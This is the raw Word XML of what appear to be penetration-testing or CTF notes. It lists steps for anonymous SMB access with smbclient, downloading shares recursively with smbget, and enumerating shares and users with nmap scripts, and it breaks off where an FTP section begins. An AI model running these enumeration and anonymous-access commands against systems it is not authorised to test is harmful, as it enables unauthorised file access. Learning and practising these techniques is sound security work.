                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3613A" w14:paraId="34FA4875" w14:textId="77777777" w:rsidTr="008918B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E6EEC1B" w14:textId="39F0820E" w:rsidR="00C3613A" w:rsidRDefault="00C3613A" w:rsidP="008261D4"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1064BA27" w14:textId="77777777" w:rsidR="00C3613A" w:rsidRDefault="00C3613A" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="034624B1" w14:textId="77777777" w:rsidR="00C3613A" w:rsidRPr="001E0F42" w:rsidRDefault="00C3613A" w:rsidP="008261D4"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78B2F201" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="002C63AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D13B2F" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49436C15" w14:textId="03FB113E" w:rsidR="008703DF" w:rsidRPr="002C63AB" w:rsidRDefault="008703DF" w:rsidP="002C63AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C63AB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C63AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:r w:rsidR="004342A3" w:rsidRPr="002C63AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | ftp</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1069"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="008261D4" w14:paraId="726A42C3" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E4BE6B7" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50DEE1E1" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>smbclient</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118C680E" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5280A977" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00254FE7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Over port 139</w:t>
            </w:r>
            <w:r w:rsidRPr="00254FE7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003F2960">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>This is over NetBIOS and is usually used for Windows to communicate over the same network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF225E7" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60A4E96E" w14:textId="77777777" w:rsidR="008261D4" w:rsidRPr="00254FE7" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00254FE7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Over port 445</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319C0AFC" w14:textId="77777777" w:rsidR="008261D4" w:rsidRPr="00254FE7" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00254FE7">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Over a TCP stack for internet SMB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A5E4036" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008703DF">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS AN SMB (port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 139 or</w:t>
            </w:r>
            <w:r w:rsidRPr="008703DF">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 445/tcp) TRY SMBCLIENT, OTHERWISE SKIP.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">If there is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> smb client, we can try to gain anonymous access using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>smbclient</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-N -L </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>\\\\</w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>\\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD22937" w14:textId="77777777" w:rsidR="008261D4" w:rsidRPr="00ED14F5" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED14F5">
              <w:t>Or,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00ED14F5">
              <w:t xml:space="preserve"> alternatively this should work the same way:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4583F567" w14:textId="77777777" w:rsidR="008261D4" w:rsidRPr="00ED14F5" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t>smbclient //</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED14F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED14F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DIRECTORY NAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-N</w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:t>Skip Password</w:t>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-L </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:t>List files and folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="2BF70F56" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="71902494" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41D837C7" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1EE0AA6E" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>If this works, it will list the shares in the smb. In that case, use the following command to see if we can poke around in those:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>smbclient</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-N </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>\\\\</w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>\\</w:t>
            </w:r>
            <w:r w:rsidRPr="009B2901">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DIRECTORY NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="1AC3275E" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="401413C2" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D46D82F" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01E073B2" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t xml:space="preserve">If inside, use </w:t>
            </w:r>
            <w:r w:rsidRPr="009B2901">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">dir </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command to list files and folders inside. From here, use </w:t>
            </w:r>
            <w:r w:rsidRPr="009B2901">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r>
              <w:t>to poke around and see what files are worth exploring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="273A41A1" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BCA015D" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FA330D1" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52948835" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="009B2901">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">get </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command to download a file to our machine which will be placed in the default location for downloads. Check these files out using </w:t>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command or </w:t>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">subl </w:t>
            </w:r>
            <w:r>
              <w:t>command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="1D49624A" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00F4984E" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4283A182" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>smbget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ED7C268" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>Another command to recursively download an SMB share is:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4649EE57" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00527EA7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>smbget</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00527EA7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-R </w:t>
            </w:r>
            <w:r w:rsidRPr="00527EA7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>smb://</w:t>
            </w:r>
            <w:r w:rsidRPr="00527EA7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00527EA7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00527EA7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DIRECTORY NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="74925280" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="234C6CD4" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="45F7C07B" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CA002C1" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>Don’t forget to use nmap to enumerate any SMB ports:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31967850" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FE283C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="00FE283C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET IP </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7851">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7851">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">smb-enum-shares.nse </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7851">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>smb-enum-users.nse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="65B3BD6A" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C73F69B" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77C866C1" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E1B0122" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007748B7">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS AN FTP SERVER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (port 21/tcp)</w:t>
            </w:r>
            <w:r w:rsidRPr="007748B7">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>, OTHERWISE SKIP.</w:t>
            </w:r>
